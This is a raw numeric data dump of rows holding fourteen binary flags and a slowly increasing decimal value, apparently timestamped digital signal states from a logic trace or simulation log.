0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883788e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883840e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883864e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883988e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884012e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884040e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884064e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884164e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884188e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884212e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884240e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884264e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884340e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884388e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884440e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884464e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884588e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884640e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884664e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884788e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884840e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884864e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5884964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5884988e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885012e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885040e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885064e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885164e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885188e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885212e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885240e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885264e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885340e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885388e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885440e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885464e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885588e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885640e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885664e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885788e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885840e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885864e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5885964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5885988e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5886012e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5886040e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5886064e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5886092e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011084e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011324e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,3.6011356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011380e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.6011692e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011716e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.6011768e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011792e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.6011844e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6011868e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,3.6011916e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6011920e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6011940e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6011992e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012068e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012116e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012140e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012192e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012220e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012268e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012292e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012340e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012368e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012420e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012444e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012492e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012516e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012568e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012592e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012620e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012640e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012664e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012740e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012764e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012812e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012840e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012916e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6012968e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6012992e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013016e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013040e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013068e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013168e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013220e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013244e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013368e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013392e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013444e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013468e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013516e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013540e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013568e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013592e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013620e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013644e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013668e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013716e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013740e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013768e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013792e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013820e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013844e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013868e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013916e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6013940e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6013992e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014020e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014068e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014168e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014220e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014244e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014340e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014368e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014392e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014420e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014444e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014468e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014492e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014516e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014540e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014568e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014592e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014620e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014668e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014716e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014740e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014768e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014792e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014820e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014840e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014868e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014916e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014940e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6014968e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6014992e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015040e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015064e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015116e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015140e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015164e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015192e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015212e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015240e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015264e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015292e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015316e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015340e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015364e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015440e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015464e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015492e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015540e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015564e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015612e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015640e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015664e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015692e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015716e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015740e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015764e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015788e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015812e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015840e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015864e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015916e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6015940e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6015964e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016016e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016040e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016116e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016164e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016188e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016212e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016240e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016264e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016364e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016440e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016464e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016516e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016540e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016612e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016668e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016716e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016740e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016764e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016788e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016812e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016840e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016864e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016892e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016916e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016940e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6016964e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6016988e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017040e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017064e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017092e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017164e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017188e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017212e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017240e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017264e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017340e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017364e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017388e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017412e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017440e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017464e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017516e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017540e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017612e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017668e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017692e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017740e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017764e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017816e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017840e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017916e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017940e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6017964e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6017988e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018012e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018040e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018064e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018116e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018140e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018164e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018188e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018212e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018240e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018264e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018292e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018316e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018340e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018364e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018388e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018412e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018464e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018492e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018516e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018540e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018564e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018612e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018664e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018692e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018716e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018740e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018764e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018788e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018812e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018836e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018864e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018892e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018912e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018940e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6018964e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6018988e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6019012e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6019036e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6019060e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.6019092e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.6019112e-02 1,0,0,0,0,0,0,0,0,1,0,0,0,0,3.6019116e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,3.6019120e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,3.6142988e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,3.6143164e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143184e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,3.6143204e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143228e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143540e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143560e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143580e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143608e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143632e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143660e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143684e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143708e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143732e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6143756e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.6143808e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6143824e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6143832e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6143840e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6143860e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6143884e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6143888e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6143932e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6143956e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6143980e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144008e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144032e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144060e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144084e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144108e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144132e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144156e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144180e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144208e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144212e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6144232e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144260e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6144308e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144332e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144340e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144356e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144380e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144408e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144432e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144460e-02 